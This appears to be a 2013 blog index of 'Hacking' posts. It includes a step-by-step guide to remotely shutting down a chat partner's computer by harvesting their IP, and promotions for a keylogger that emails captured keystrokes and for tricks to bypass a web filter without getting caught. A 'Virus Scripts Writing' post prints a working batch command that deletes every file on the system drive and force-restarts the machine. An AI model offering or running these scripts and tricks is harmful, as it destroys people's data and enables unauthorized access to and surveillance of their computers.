Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Sunday, 8 September 2013

Shutdown Friend's Computer using Facebook Chat


This is a very simple and effective trick for desktop computers and laptops, all you need is to follow these steps :


Step 1:

Before you start clear all history, cookies, stop downloads and close all
extra tabs i.e stop all internet based activities. Now go to your messanger and start
chatting with the friend you want to prank.


Step 2:
Click on “Start” >> “Run”.

Step 3:
Run”>>in run type “cmd.exe” and press Enter.


Step 4:
Command prompt will now open. In cmd.exe type  "netstat -n".

Step 5:
Now if you have successfully executed Step 4 correctly,
you will see one ip address  many times in cmd window (victim’s ip).

Step 6:
Now, type "shutdown -i". A box will appear now click on “add“ button.A small box will pop up. Here, enter the ip address of victim which was grabbed using "netstat -n" command.

Step 7:
Now there are three options visible, click on “shutdown”.

Step 8:
If you want to show a message to victim's
computer screen, check the "warm users of the action"
and set the number of seconds .

Step 9:
You can select any option in shutdown
event tracker.

Step 10:
At last you can type a message like “your computer is now hacked”. Just click on OK. Enjoy!!!!!

 
 
Please comment and share, and don't forget to follow to continue reading some more interesting posts.
Enjoy!!!!!!

 

You should also see "Notepad Trick to Shutdown remote computer".  
Read More

Monday, 2 September 2013

How to Change Windows Logon Screen Background

step 1: open the windows start menu, enter regedit into search bar.
step 2: right click on EY_LOCAL_MACHINE and select find.
Read More

Monday, 26 August 2013

Break Fortiguard web filter

Break Fortiguard web filter

Let's know how to crack fortiguard web filter in 3 easy steps. All 3 are very effective and you can use them at schools, universities and offices. But Keep always one thing in mind don't get caught. If caught you might get severe punishment for breaking the laws. Here they are..
Read More

Sunday, 25 August 2013

Hack Using Keylogger

Xenotix Python Windows Keylogger

Size: 5.79 KB
Credit: Ajin Abraham
Windows Keylogger Xenotix Features:
1. Store windows keylogger logs locally
2. Send windows keylogger logs to google forms
3. Send windows keylogger logs to email
Read More

Session Hijacking in Public Networks

What is Session Hijacking?

Every time you connected to the web application (usually a dynamic web application) you will have a unique ID called "session", this session will identifies you as a valid user and will always valid until you kill the session (log out process) or the session has expired. Some bad people trying to identifies or guessing the session ID value to gain privileges as a valid user in a web application.
Read More

Sunday, 18 August 2013

DOS Attacks

Denial of service (DOS) attack, a type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. Many DoS attacks, such as the Ping of Death and Teardrop attacks, exploit limitations in the TCP/IP protocols.

Types:
Teardrop attack is type of attack where fragmented packets are forged to overlap each other when the receiving host tries to reassemble them.

Read More

Make Your Keyboard Lights Disco Light

This trick just makes your keyboard lights do disco.
The script I’m sharing with you, when executed makes your Caps, Num and Scroll Lock’s light flash in a cool rhythmic way!

1.This piece of code makes ur keyboard a live disco..

Read More

Virus Scripts Writing

I am not responsible for any damage or error reporting in Your pc do it as ur own risk. These coding only for knowledge concept .
Open Notepad.....
copy the scripts and enjoy!!! 


>>This Virus Deletes All The Content Of A Drive...

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00


Save The Above Code a .bat file



>> This Will Crash Ur Computer

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Read More

ClickJacking

Clickjacking attack allows to perform an action on victim website, Mostly social networking sites are targeted.
Read More

Havij v1.15 Advanced SQL Injection

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

Read More

Thursday, 15 August 2013

Remove BIOS password

BIOS password is not stored on your hard drive, it is on temporary memory.
so it is very easy to remove the password . :p
>Open the CPU
Read More

Unblock Sites and Downloads over your wifi network

VPN

A virtual private network (VPN) is a network that uses a public telecommunication infrastructure, such as the Internet,
Read More